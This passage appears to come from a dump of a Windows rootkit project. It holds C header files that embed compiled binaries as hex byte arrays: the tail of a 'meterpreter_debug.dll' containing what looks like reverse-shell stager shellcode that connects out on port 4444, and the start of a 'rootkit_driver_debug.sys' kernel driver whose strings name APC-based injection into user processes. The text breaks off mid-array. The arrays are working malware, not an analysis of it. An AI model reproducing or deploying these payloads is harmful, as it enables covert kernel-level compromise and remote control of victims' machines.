x07,0x03,0x77,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x41,0x00,0xf8,0x01,0x4d,0x65,\r\n0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x41,0x00,0x55,0x53,0x45,0x52,0x33,0x32,\r\n0x2e,0x64,0x6c,0x6c,0x00,0x00,0x5e,0x01,0x47,0x65,0x74,0x55,0x73,0x65,0x72,0x4e,\r\n0x61,0x6d,0x65,0x41,0x00,0x00,0x41,0x44,0x56,0x41,0x50,0x49,0x33,0x32,0x2e,0x64,\r\n0x6c,0x6c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x92,0x26,0x00,0x00,\r\n0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x88,0x26,0x00,0x00,\r\n0x8c,0x26,0x00,0x00,0x90,0x26,0x00,0x00,0x60,0x13,0x00,0x00,0xa8,0x26,0x00,0x00,\r\n0x00,0x00,0x6d,0x65,0x74,0x65,0x72,0x70,0x72,0x65,0x74,0x65,0x72,0x5f,0x64,0x65,\r\n0x62,0x75,0x67,0x2e,0x64,0x6c,0x6c,0x00,0x44,0x75,0x6d,0x6d,0x79,0x00,0x00,0x00,\r\n0x52,0x53,0x44,0x53,0x82,0x5a,0x19,0x91,0x44,0xdc,0xaa,0x48,0x8a,0xc8,0x7d,0xac,\r\n0xf1,0xd6,0xba,0x09,0x01,0x00,0x00,0x00,0x58,0x3a,0x5c,0x64,0x65,0x76,0x5c,0x5f,\r\n0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x73,0x5c,0x5f,0x4c,0x6f,0x63,0x61,0x6c,0x5c,\r\n0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x72,0x79,0x52,\r\n0x6f,0x6f,0x74,0x6b,0x69,0x74,0x5c,0x73,0x72,0x63,0x5c,0x6d,0x65,0x74,0x65,0x72,\r\n0x70,0x72,0x65,0x74,0x65,0x72,0x5f,0x64,0x65,0x62,0x75,0x67,0x2e,0x70,0x64,0x62,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,\r\n0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,\r\n0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,\r\n0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,\r\n0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,\r\n0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,\r\n0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,\r\n0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,\r\n0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,\r\n0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,\r\n0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,\r\n0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,\r\n0xd5,0x97,0x31,0xdb,0x53,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,\r\n0x68,0xc2,0xdb,0x37,0x67,0xff,0xd5,0x53,0x57,0x68,0xb7,0xe9,0x38,0xff,0xff,0xd5,\r\n0x53,0x53,0x57,0x68,0x74,0xec,0x3b,0xe1,0xff,0xd5,0x57,0x97,0x68,0x75,0x6e,0x4d,\r\n0x61,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,\r\n0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,\r\n0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,\r\n0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x10,0x00,0x00,0xc8,0x00,0x00,0x00,0x27,0x30,0x2e,0x30,0x34,0x30,0x3b,0x30,\r\n0x4d,0x30,0x54,0x30,0x66,0x30,0x73,0x30,0x85,0x30,0x97,0x30,0x9e,0x30,0xba,0x30,\r\n0xd5,0x30,0xdc,0x30,0xee,0x30,0x03,0x31,0x0d,0x31,0x2b,0x31,0x38,0x31,0x40,0x31,\r\n0x46,0x31,0x4d,0x31,0x66,0x31,0x6e,0x31,0x74,0x31,0x7b,0x31,0x88,0x31,0x8f,0x31,\r\n0x9e,0x31,0xa4,0x31,0xb6,0x31,0xbd,0x31,0xca,0x31,0xd1,0x31,0xef,0x31,0xf4,0x31,\r\n0x7e,0x32,0x85,0x32,0x95,0x32,0xa0,0x32,0xae,0x32,0xb5,0x32,0xe3,0x32,0x00,0x33,\r\n0x0a,0x33,0x17,0x33,0x2b,0x33,0x31,0x33,0x3b,0x33,0x63,0x33,0x68,0x33,0x70,0x33,\r\n0x78,0x33,0x83,0x33,0xc4,0x33,0xca,0x33,0xcf,0x33,0xd7,0x33,0xec,0x33,0xf1,0x33,\r\n0x05,0x34,0x0a,0x34,0x2a,0x34,0x56,0x34,0x86,0x34,0x8c,0x34,0x9b,0x34,0xa3,0x34,\r\n0xc0,0x34,0xc9,0x34,0xd0,0x34,0xe2,0x34,0xe8,0x34,0xee,0x34,0xf4,0x34,0xfa,0x34,\r\n0x00,0x35,0x06,0x35,0x0c,0x35,0x12,0x35,0x18,0x35,0x1e,0x35,0x24,0x35,0x2a,0x35,\r\n0x30,0x35,0x36,0x35,0x3c,0x35,0x42,0x35,0x48,0x35,0x4e,0x35,0x54,0x35,0x5a,0x35,\r\n0x60,0x35,0x66,0x35,0x6c,0x35,0x72,0x35,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\r\n};" }, { "path": "src/includes/rootkit_driver_debug.sys.h", "content": "// 23680 bytes readed form ..\\rootkit_driver_debug.sys...\r\nunsigned char rootkit_driver[] =\r\n{\r\n0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff,0xff,0x00,0x00,\r\n0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xe0,0x00,0x00,0x00,\r\n0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68,\r\n0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f,\r\n0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20,\r\n0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x45,0x95,0x8a,0x93,0x01,0xf4,0xe4,0xc0,0x01,0xf4,0xe4,0xc0,0x01,0xf4,0xe4,0xc0,\r\n0x01,0xf4,0xe5,0xc0,0x2b,0xf4,0xe4,0xc0,0x26,0x32,0x9f,0xc0,0x04,0xf4,0xe4,0xc0,\r\n0x26,0x32,0x89,0xc0,0x03,0xf4,0xe4,0xc0,0x08,0x8c,0x60,0xc0,0x07,0xf4,0xe4,0xc0,\r\n0x08,0x8c,0x76,0xc0,0x00,0xf4,0xe4,0xc0,0x08,0x8c,0x75,0xc0,0x00,0xf4,0xe4,0xc0,\r\n0x52,0x69,0x63,0x68,0x01,0xf4,0xe4,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x50,0x45,0x00,0x00,0x4c,0x01,0x04,0x00,0xc6,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0xe0,0x00,0x02,0x21,0x0b,0x01,0x09,0x00,0x00,0x56,0x00,0x00,\r\n0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x30,0x26,0x00,0x00,0x80,0x02,0x00,0x00,\r\n0x80,0x2d,0x00,0x00,0x00,0x00,0x00,0x10,0x80,0x00,0x00,0x00,0x80,0x00,0x00,0x00,\r\n0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x80,0x5c,0x00,0x00,0x80,0x02,0x00,0x00,0x46,0xc6,0x00,0x00,0x01,0x00,0x00,0x00,\r\n0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x41,0x00,0x00,0x00,\r\n0xf4,0x54,0x00,0x00,0x3c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x80,0x59,0x00,0x00,0xd0,0x02,0x00,0x00,0x80,0x03,0x00,0x00,0x1c,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x68,0x0e,0x00,0x00,0x40,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x02,0x00,0x00,0xb0,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00,\r\n0x8c,0x2a,0x00,0x00,0x80,0x02,0x00,0x00,0x00,0x2b,0x00,0x00,0x80,0x02,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x68,\r\n0x2e,0x64,0x61,0x74,0x61,0x00,0x00,0x00,0xa0,0x00,0x00,0x00,0x80,0x2d,0x00,0x00,\r\n0x00,0x01,0x00,0x00,0x80,0x2d,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xc8,0x49,0x4e,0x49,0x54,0x00,0x00,0x00,0x00,\r\n0xfa,0x2a,0x00,0x00,0x80,0x2e,0x00,0x00,0x00,0x2b,0x00,0x00,0x80,0x2e,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0xe2,\r\n0x2e,0x72,0x65,0x6c,0x6f,0x63,0x00,0x00,0xd8,0x02,0x00,0x00,0x80,0x59,0x00,0x00,\r\n0x00,0x03,0x00,0x00,0x80,0x59,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x44,0x59,0x00,0x00,0x2c,0x59,0x00,0x00,0x5e,0x59,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x1c,0x56,0x00,0x00,0x30,0x56,0x00,0x00,0x48,0x56,0x00,0x00,0x66,0x56,0x00,0x00,\r\n0x82,0x56,0x00,0x00,0x9a,0x56,0x00,0x00,0xb0,0x56,0x00,0x00,0xba,0x56,0x00,0x00,\r\n0xd4,0x56,0x00,0x00,0xe8,0x56,0x00,0x00,0xf2,0x56,0x00,0x00,0x0c,0x57,0x00,0x00,\r\n0x26,0x57,0x00,0x00,0x3e,0x57,0x00,0x00,0x52,0x57,0x00,0x00,0x64,0x57,0x00,0x00,\r\n0x7c,0x57,0x00,0x00,0x0e,0x56,0x00,0x00,0xb0,0x57,0x00,0x00,0xc4,0x57,0x00,0x00,\r\n0xd4,0x57,0x00,0x00,0xe6,0x57,0x00,0x00,0x06,0x58,0x00,0x00,0x1a,0x58,0x00,0x00,\r\n0x24,0x58,0x00,0x00,0x2e,0x58,0x00,0x00,0x46,0x58,0x00,0x00,0x50,0x58,0x00,0x00,\r\n0x5a,0x58,0x00,0x00,0x76,0x58,0x00,0x00,0x98,0x58,0x00,0x00,0xb6,0x58,0x00,0x00,\r\n0xd2,0x58,0x00,0x00,0xea,0x58,0x00,0x00,0x0a,0x59,0x00,0x00,0x04,0x56,0x00,0x00,\r\n0xec,0x55,0x00,0x00,0x98,0x57,0x00,0x00,0xe0,0x55,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0xc6,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x58,0x03,0x00,0x00,\r\n0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x72,0x6f,0x6f,0x74,0x6b,0x69,0x74,0x5f,\r\n0x64,0x72,0x69,0x76,0x65,0x72,0x5f,0x64,0x65,0x62,0x75,0x67,0x2e,0x73,0x79,0x73,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0xc6,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,\r\n0x64,0x00,0x00,0x00,0xb0,0x0e,0x00,0x00,0xb0,0x0e,0x00,0x00,0x42,0x00,0x6f,0x00,\r\n0x67,0x00,0x75,0x00,0x73,0x00,0x50,0x00,0x72,0x00,0x6f,0x00,0x74,0x00,0x6f,0x00,\r\n0x00,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x65,0x72,\r\n0x50,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73,\r\n0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,\r\n0x0a,0x00,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x4b,0x65,0x72,0x6e,0x65,0x6c,\r\n0x41,0x70,0x63,0x52,0x6f,0x75,0x74,0x69,0x6e,0x65,0x28,0x29,0x0a,0x00,0x00,0x00,\r\n0x49,0x6e,0x6a,0x65,0x63,0x74,0x46,0x69,0x6e,0x64,0x50,0x72,0x6f,0x63,0x65,0x73,\r\n0x73,0x28,0x29,0x3a,0x20,0x22,0x25,0x77,0x5a,0x22,0x2c,0x20,0x50,0x49,0x44,0x20,\r\n0x3d,0x20,0x25,0x64,0x0a,0x00,0x00,0x00,0x50,0x73,0x4c,0x6f,0x6f,0x6b,0x75,0x70,\r\n0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,\r\n0x49,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x3b,0x20,0x73,0x74,0x61,0x74,\r\n0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x50,0x73,0x4c,0x6f,\r\n0x6f,0x6b,0x75,0x70,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x50,0x72,0x6f,\r\n0x63,0x65,0x73,0x73,0x49,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x3b,0x20,\r\n0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,\r\n0x49,0x6d,0x6a,0x65,0x63,0x74,0x4d,0x61,0x70,0x44,0x6c,0x6c,0x49,0x6d,0x61,0x67,\r\n0x65,0x28,0x29,0x3a,0x20,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x20,0x66,0x6f,0x72,0x20,\r\n0x69,0x6d,0x61,0x67,0x65,0x20,0x61,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x64,0x20,\r\n0x61,0x74,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x49,0x6d,0x6a,0x65,\r\n0x63,0x74,0x4d,0x61,0x70,0x44,0x6c,0x6c,0x49,0x6d,0x61,0x67,0x65,0x28,0x29,0x20,\r\n0x45,0x58,0x43,0x45,0x50,0x54,0x49,0x4f,0x4e,0x0a,0x00,0x00,0x5a,0x77,0x41,0x6c,\r\n0x6c,0x6f,0x63,0x61,0x74,0x65,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d,\r\n0x6f,0x72,0x79,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73,0x3b,0x20,0x73,0x74,0x61,\r\n0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,\r\n0x5a,0x77,0x51,0x75,0x65,0x72,0x79,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69,\r\n0x6f,0x6e,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,\r\n0x73,0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,\r\n0x78,0x0a,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e,0x74,0x6f,0x50,0x72,\r\n0x6f,0x63,0x65,0x73,0x73,0x28,0x29,0x3a,0x20,0x49,0x6d,0x61,0x67,0x65,0x20,0x65,\r\n0x6e,0x74,0x72,0x79,0x20,0x70,0x6f,0x69,0x6e,0x74,0x20,0x69,0x73,0x20,0x61,0x74,\r\n0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x43,0x61,0x6c,0x6c,\r\n0x67,0x61,0x74,0x65,0x20,0x61,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x64,0x20,0x61,\r\n0x74,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x49,0x6e,0x6a,0x65,\r\n0x63,0x74,0x49,0x6e,0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x28,0x29,0x3a,\r\n0x20,0x45,0x72,0x72,0x6f,0x72,0x20,0x77,0x68,0x69,0x6c,0x65,0x20,0x64,0x65,0x6c,\r\n0x69,0x76,0x65,0x72,0x69,0x6e,0x67,0x20,0x41,0x50,0x43,0x0a,0x00,0x00,0x00,0x00,\r\n0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e,0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,\r\n0x73,0x28,0x29,0x3a,0x20,0x41,0x50,0x43,0x20,0x64,0x65,0x6c,0x69,0x76,0x65,0x72,\r\n0x65,0x64,0x21,0x0a,0x00,0x00,0x00,0x00,0x4b,0x65,0x49,0x6e,0x73,0x65,0x72,0x74,\r\n0x51,0x75,0x65,0x75,0x65,0x41,0x70,0x63,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,\r\n0x0a,0x00,0x00,0x00,0x5a,0x77,0x41,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x56,0x69,\r\n0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x28,0x29,0x20,0x66,0x61,\r\n0x69,0x6c,0x73,0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,\r\n0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e,\r\n0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x28,0x29,0x20,0x45,0x58,0x43,0x45,\r\n0x50,0x54,0x49,0x4f,0x4e,0x0a,0x00,0x00,0x4f,0x62,0x4f,0x70,0x65,0x6e,0x4f,0x62,\r\n0x6a,0x65,0x63,0x74,0x42,0x79,0x50,0x6f,0x69,0x6e,0x74,0x65,0x72,0x28,0x29,0x20,\r\n0x66,0x61,0x69,0x6c,0x73,0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,\r\n0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e,\r\n0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x4e,0x61,0x6d,0x65,0x28,\r\n0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x3a,0x20,0x55,0x6e,0x61,0x62,0x6c,0x65,0x20,\r\n0x74,0x6f,0x20,0x66,0x69,0x6e,0x64,0x20,0x70,0x72,0x6f,0x63,0x65,0x73,0x73,0x20,\r\n0x22,0x25,0x77,0x73,0x22,0x0a,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e,\r\n0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x49,0x64,0x28,0x29,0x20,\r\n0x45,0x52,0x52,0x4f,0x52,0x3a,0x20,0x55,0x6e,0x61,0x62,0x6c,0x65,0x20,0x74,0x6f,\r\n0x20,0x66,0x69,0x6e,0x64,0x20,0x70,0x72,0x6f,0x63,0x65,0x73,0x73,0x20,0x50,0x49,\r\n0x44,0x3d,0x25,0x64,0x0a,0x00,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e,\r\n0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x20,0x45,0x52,0x52,0x